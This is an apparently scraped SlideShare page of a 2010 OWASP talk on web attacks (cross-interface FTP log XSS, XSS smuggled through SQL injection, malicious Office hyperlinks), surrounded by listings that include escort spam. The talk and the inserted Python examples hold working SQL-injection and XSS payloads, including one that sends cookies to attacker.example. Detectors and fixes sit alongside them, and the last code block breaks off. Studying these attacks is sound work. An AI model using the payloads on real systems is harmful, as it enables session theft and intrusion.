Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Aditya K Sood
 
NGR Bot Analysis Paper
NGR Bot Analysis PaperNGR Bot Analysis Paper
NGR Bot Analysis PaperAditya K Sood
 
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Aditya K Sood
 
Commercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks MalwareCommercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks MalwareAditya K Sood
 
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Aditya K Sood
 
Browser Malware Taxonomy
Browser Malware TaxonomyBrowser Malware Taxonomy
Browser Malware TaxonomyAditya K Sood
 
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...Aditya K Sood
 
PenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingPenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingAditya K Sood
 

Mehr von Aditya K Sood (20)

Emerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks MalwareEmerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks Malware
 
Enfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB InstancesEnfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB Instances
 
Detecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in ElasticsearchDetecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in Elasticsearch
 
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
 
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
 
Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K SoodNetwork Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
 
Abusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and DefencesAbusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and Defences
 
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin MagazineNIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
 
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
 
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
 
ToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android Infections
 
DEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedDEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and Operated
 
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
 
NGR Bot Analysis Paper
NGR Bot Analysis PaperNGR Bot Analysis Paper
NGR Bot Analysis Paper
 
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
 
Commercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks MalwareCommercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks Malware
 
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
 
Browser Malware Taxonomy
Browser Malware TaxonomyBrowser Malware Taxonomy
Browser Malware Taxonomy
 
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
 
PenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingPenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile Hacking
 

Kürzlich hochgeladen

08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 

Kürzlich hochgeladen (20)

08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 

OWASP App Sec US - 2010

  • 3. About Me
     Founder, SECNICHE Security Labs. http://www.secniche.org
     PhD Candidate at Michigan State University.
     Senior Security Practitioner, Armorize. http://www.armorize.com
     Worked previously for COSEINC as Senior Security Researcher and as Security Consultant for KPMG.
     Author for HITB E-Zine, Hakin9, ELSEVIER, USENIX Journals.
     Likes to do bug hunting and malware dissection.
     Released advisories to forefront companies.
     Active speaker at security conferences including RSA.
     Blog: http://zeroknock.blogspot.com
  • 4. Notification
    All the vulnerabilities discussed in this talk are in the process of being patched. This discussion is about understanding the attack methods and applying them in a real-time environment. All for learning and education purposes.
  • 5. Agenda
    Web 2.0 – Walkthrough
     Web 2.0 – The real world
     Web 2.0 trends (vulnerability classification, browser state)
     Web 2.0 – Exploitation shift
     Web application security is not a separate component!
    Web Vulnerability Hunting (Exemplary)
     – Cross Interface Attacks (CIA) / attacking backend login consoles /
     – SQLXSSI – Fusion {XSS, SQL} / XSS payload in SQL parameters /
     – Document rendering attacks / exploiting content transformation /
     – Web widget interface flaws / testing the mini web playground /
     – Persistent redirection attacks / exploiting logout modules /
     – Declarative security manipulation / tampering browsers /
     – Insecure content inclusion / exploitation by behavior /
    Conclusion
  • 6. Web 2.0 – The Present World
    Components in the real world (diagram)
  • 7. Web Trends – Incident Classification
    Top web incidents/trends of 2009 and predictions for 2010 (© stats by Breach)
  • 8. Web Trends – Vulnerability Classes
    Web vulnerability classification, 2009 (© website stats by Cenzic)
  • 9. Web Trends – Exploited Browsers
    Web vulnerability classification, 2009 (© stats by Cenzic)
  • 10. Web 2.0 – Exploitation Shift
    Why?
     System vulnerabilities are getting harder to exploit
     Web 2.0 service platforms
     Client-side exploitation: easy control through browsers
     Origin of the web as a service standard
     Increased business dependency on Web 2.0
     Centralized platform for content sharing from different resources
     Online social networking
     Wider window of exploitation through the web
     Information gathering about targets is easy on the web
  • 11. Web Application – Security Is Not Separate!
    Robust web application development: Design, Security, Privacy, Reliability (diagram)
  • 12. Web Application Vulnerability Hunting
    Pillars
     Design and Development
     Attack and Exploitation
     Patching and Rebuilding
  • 13. Cross Interface Attacks (CIA)
     Hardware devices ship with admin interfaces.
     Admin interfaces: {Web, FTP, Telnet}
     Do we require all of these admin interfaces?
     If the web admin is allowed, what about the backend consoles?
     Is URL restriction a good practice?
     Is it advantageous to have backend consoles?
     Does access control serve well?
     CIA targets FTP/Telnet admin consoles.
     Developing the attack surface step by step.
    Hardware devices: firewalls, disk stations, management systems etc.
  • 14. Cross Interface Attacks (CIA)
     Attack base and considerations
      – Presence of an FTP/Telnet admin login console
      – Hardware appliances have a default error logging mechanism
      – Log interfaces are served in HTML without filtering
      – A bad design practice from a security point of view
      – The default behaviour of protocols such as FTP/Telnet helps information gathering
     FTP truth
      – Username and password are authenticated together; the failure is only reported after both are supplied, a practice followed to avoid enumeration of user accounts
      – No check on login attempts. No check on characters.
      – Usually widely accessible. Do you think access control is required?
  • 15. Cross Interface Attacks (CIA)
    Attacking and testing
     Gathering information about allowed characters
     No aim to get authenticated: "530 Login incorrect" is what we require.
     Malicious payloads are used as username and password
      – Injections / scripts / iframes / DOM calls / persistent payloads
      – Inject whatever you want!
      – A good point for triggering CSRF attacks
     Of course, authentication fails. The error gets logged.
     Payloads become persistent. They can also be reflective.
     Bad design practice
      – Unencoded / unfiltered HTML rendering
      – Inappropriate web logging mechanism
     Voila! Something happens.
  • 16. Cross Interface Attacks (CIA)
    Scrutinizing the default buffer
     Determine the number of characters that are allowed
     Supply an excess of buffer in the FTP_USER_NAME input
     FTP_PASS_WORD reflects the allowed FTP_USER_NAME
     Injection points: {FTP_USER_NAME, FTP_PASS_WORD}
  • 17. Cross Interface Attacks (CIA)
    Injecting payloads
     Supply payloads as credentials
     Input points: {FTP_USER_NAME, FTP_PASS_WORD}
  • 18. Cross Interface Attacks (CIA)
    What else?
     Anything
     Irrespective of the user's environment {OS / browser etc.}
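The CIA chain of slides 13 to 18 (plant a payload as the FTP username, let the failed login be written to the appliance log, have the web admin console render that log unescaped), as an added Python example that is not part of the talk. The log line layout, the `ftpd` prefix and the two renderer functions are assumptions standing in for an appliance's firmware; the log excerpt is constructed. The socket helper is the attacker-side step and must only be pointed at systems you are authorised to test.

```python
"""Cross Interface Attack walkthrough: an XSS payload is supplied as the FTP
username, the appliance logs the failed login, and the web admin console
renders that log as HTML. Added example, not from the original slides; the
log format, the ftpd prefix and both renderers are assumed, not a vendor's."""
import html
import re
import socket
from typing import Dict, List

# Payload planted as the FTP username. We expect "530 Login incorrect";
# the point is only that the attempt gets written to the appliance log.
XSS_PAYLOAD = ('<script>new Image().src="http://attacker.example/c?"'
               '+document.cookie</script>')


def ftp_login_attempt(host: str, username: str, password: str,
                      port: int = 21, timeout: float = 5.0) -> str:
    """Send USER/PASS to a live FTP service and return the final reply line.
    Run this only against systems you are authorised to test."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        reader = sock.makefile("rb")
        reader.readline()                                   # 220 banner
        sock.sendall(f"USER {username}\r\n".encode("latin-1"))
        reader.readline()                                   # 331 need password
        sock.sendall(f"PASS {password}\r\n".encode("latin-1"))
        return reader.readline().decode("latin-1", "replace").strip()


# --- appliance side (simulated) --------------------------------------------
# Assumed log line layout; the username is stored verbatim, which is what
# the attack relies on.
LOG_LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) ftpd\[\d+\]: FAILED LOGIN user=(?P<user>.*) from (?P<ip>[\d.]+)$")

# Constructed log excerpt: one ordinary failure, one carrying the payload.
SAMPLE_LOG = [
    "2010-09-10 10:00:41 ftpd[1201]: FAILED LOGIN user=admin from 198.51.100.23",
    f"2010-09-10 10:01:02 ftpd[1202]: FAILED LOGIN user={XSS_PAYLOAD} from 203.0.113.7",
]


def parse_ftp_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return the failed-login entries as dicts; lines that do not match are skipped."""
    entries = []
    for line in lines:
        m = LOG_LINE_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def render_log_vulnerable(entries: List[Dict[str, str]]) -> str:
    """Log viewer as shipped: fields interpolated straight into the HTML table,
    so markup in the username becomes live script for whoever opens the page."""
    rows = "".join(f"<tr><td>{e['ts']}</td><td>{e['user']}</td><td>{e['ip']}</td></tr>"
                   for e in entries)
    return f"<table>{rows}</table>"


def render_log_fixed(entries: List[Dict[str, str]]) -> str:
    """Same viewer with output encoding: every field is HTML-escaped (quotes
    included) at render time, so the payload is shown as text, not executed."""
    rows = "".join(
        "<tr>" + "".join(f"<td>{html.escape(e[k], quote=True)}</td>"
                         for k in ("ts", "user", "ip")) + "</tr>"
        for e in entries)
    return f"<table>{rows}</table>"


def has_live_markup(rendered: str) -> bool:
    """Quick regression check a tester can run on the console's HTML output."""
    return "<script" in rendered.lower()
```

The fix is output encoding at the point where the log is rendered, not input filtering on the FTP side: the FTP daemon cannot know which characters are dangerous for a page it never produces, and the same log is often exposed through Telnet and syslog too.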
  • 19. SQLXSSI: Fusion {XSS , SQLI} Differential attack surface  How far we can go in using the standard vulnerabilities?  How many different ways of exploitation can be developed?  Why not fusing one vulnerability into another ?  Its’ all about game of payloads Triggering XSS through SQL Injection  All types of XSS possibilities  Verbose SQLI vulnerability is the base  Errors with truncated SQL queries with parameters  XSS payloads injected in SQL parameters  Obfuscating payloads  Basically, an XSS injection using database semantics  Reflective in nature OWASP 19
  • 20. SQLXSSI: Fusion {XSS , SQLI} Generalized pattern  <script>alert(document.cookie)</script> = 0x3c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f736 3726970743e http://vulnerable.com/web_page/index.php? id=1and(select1from(selectcount(*),concat(0x3c7363726970743e616c657274282f7363686170 2f293c2f7363726970743e,floor(rand(0)*2)) x from table-name groupby x)a)  <script src="http://wwww.malicious.org/ex.js" />= 3c736372697074207372633d22687474703a2f2f777777772e6d616c6963696f75732 e6f72672f65782e6a7322202f3e http://vulnerable.com/web_page/index.php?id=1and(select1from(selectcount(*),concat(0x 3c736372697074207372633d22687474703a2f2f777777772e6d616c6963696f75732e6f72672f 65782e6a7322202f3e,floor(rand(0)*2)) x from table-name groupby x)a) OWASP 20
  • 21. SQLXSSI: Fusion {XSS , SQLI} – Example (1) Error gets rendered in browser OWASP 21
  • 22. SQLXSSI: Fusion {XSS , SQLI} – Example (2) Injected XSS Payload in SQL parameter OWASP 22
  • 23. SQLXSSI: Fusion {XSS, SQLI} – Example (3)
    Injected payload starts downloading malicious XLS file
  • 24. SQLXSSI: Fusion {XSS, SQLI} – Example (4)
    Image with malicious request is injected
  • 25. SQLXSSI: Fusion {XSS, SQLI}
    Real world!
    - Websites are getting more susceptible to these issues
    - Vulnerability ratio exceeds 1:2
    Thanks to RB (1337) (http://www.schap.org) for initiating this type of attack surface
    So what!
    - One vulnerability can lead to another. Testing is inadvertent.
    - SQLI can be used in a differential manner
    - Advanced step in conducting XSS through SQLI
    - Database design matters
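The key defensive point of slides 19-25 is that the HTML never appears in clear text in the request: it is hidden inside a MySQL 0x... hex literal, so a filter that only greps the raw query for "<script" misses it. The following detector is an added example (not from the original slides) that decodes every hex literal in a request URL before looking for markup; the sample URLs and the host name app.example are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample request URLs (not from the original slides); the second one
# carries an XSS payload hidden in a MySQL 0x... hex literal inside an SQL injection.
SAMPLE_REQUESTS = [
    "http://app.example/index.php?id=1",
    "http://app.example/index.php?id=1 and (select 1 from (select count(*),"
    "concat(0x3c7363726970743e616c6572742831293c2f7363726970743e,floor(rand(0)*2))"
    " x from information_schema.tables group by x)a)",
    "http://app.example/index.php?id=0x41",
]

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")
SQL_MARKERS = re.compile(r"\b(select|union|concat|floor|rand|group\s+by)\b", re.I)
# Heuristic markup indicators, checked against the *decoded* literals only.
HTML_MARKERS = re.compile(
    r"<\s*(script|img|iframe|svg|object|embed)\b|\bon\w+\s*=|javascript:", re.I)


def decode_hex_literals(text):
    """Return the decoded text of every MySQL-style 0x... literal found in text."""
    decoded = []
    for match in HEX_LITERAL.finditer(text):
        digits = match.group(1)
        if len(digits) % 2:          # odd length cannot be a byte string
            continue
        decoded.append(bytes.fromhex(digits).decode("utf-8", "replace"))
    return decoded


def classify_request(url):
    """Label one request URL as 'clean', 'sqli' or 'sqlxssi'."""
    query = unquote(urlsplit(url).query)
    if not SQL_MARKERS.search(query):
        return "clean"
    # A filter that only inspects the raw query misses the HTML: it is hex-encoded.
    if any(HTML_MARKERS.search(chunk) for chunk in decode_hex_literals(query)):
        return "sqlxssi"
    return "sqli"


if __name__ == "__main__":
    for url in SAMPLE_REQUESTS:
        print(classify_request(url), url)
```

Detection aside, the fix on the application side is the one the slides imply: never render raw database error text into the page, and HTML-encode whatever is echoed.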
  • 26. Document Rendering Attacks
    Concept
    - Inability of existing filters used for content transformation
    - Inappropriate design of web applications
    - Mistake – using browsers as editors for content rendering
    - Do you want to upload your resume in MS Word?
    Attack vector
    - Setting payloads as inline URL links in the Office documents
    - The document is required to be viewed. Preview properties.
    - Persistent in nature primarily. User interaction is required.
    - MS Word, PowerPoint etc. all work well depending on the web application
    Bypassing XSS filters through Office documents
    http://www.secniche.org/papers/SNS_09_01_Evad_Xss_Filter_Msword.pdf
  • 27. Document Rendering Attacks
    Payload is injected as a hyperlink
  • 28. Document Rendering Attacks
    The document is edited in the enterprise web application
  • 29. Document Rendering Attacks
    Exploited
  • 30. Document Rendering Attacks
    Case Study: XML based authoring flaws
    - Vulnerability reported in the SCRIBD platform in 2009
    - Reported and patched
    - Scribd failed to implement a filter on payloads set in protocol handlers
    - Links directly injected and converted to XML
    - Lastly, compiled and displayed in the Flash player
    IPaper Platform XML based Link Authoring Flaw – Scribd
    http://coseinc.com/en/index.php?rt=download&act=publication&file=design_inaccuracy_inside_ipaper_framework.pdf
  • 31. XML Authoring Flaw – Case Study
    XML working model
  • 32. XML Authoring Flaw – Case Study (Example)
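Slides 26-32 describe payloads carried as hyperlinks inside uploaded Office documents and then rendered by the web application. An upload handler can catch this before rendering by inspecting the link targets rather than searching the document for markup. The following is an added example, not code from the original slides or from any of the vendors named: it builds a minimal .docx-shaped fixture (a real document has far more parts, but hyperlink targets do live in word/_rels/document.xml.rels) and flags every target whose URL scheme is not on an allowlist.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# OOXML relationship namespace and the relationship type Word uses for hyperlinks.
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
HYPERLINK_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                  "relationships/hyperlink")
ALLOWED_SCHEMES = {"http", "https", "mailto"}


def build_sample_docx(targets):
    """Construct a minimal .docx-shaped zip whose hyperlinks point at `targets`
    (test fixture only; the document body is irrelevant to the check)."""
    rels = ET.Element("Relationships", xmlns=RELS_NS)
    for i, target in enumerate(targets, 1):
        ET.SubElement(rels, "Relationship", Id=f"rId{i}", Type=HYPERLINK_TYPE,
                      Target=target, TargetMode="External")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels",
                    ET.tostring(rels, encoding="unicode"))
    return buf.getvalue()


def unsafe_hyperlinks(docx_bytes):
    """Return every hyperlink target whose scheme is not in ALLOWED_SCHEMES.

    Checking the scheme (rather than searching for '<script') catches the
    javascript:, vbscript: and data: links that turn a rendered document into XSS.
    """
    flagged = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".rels")):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("Type") != HYPERLINK_TYPE:
                    continue
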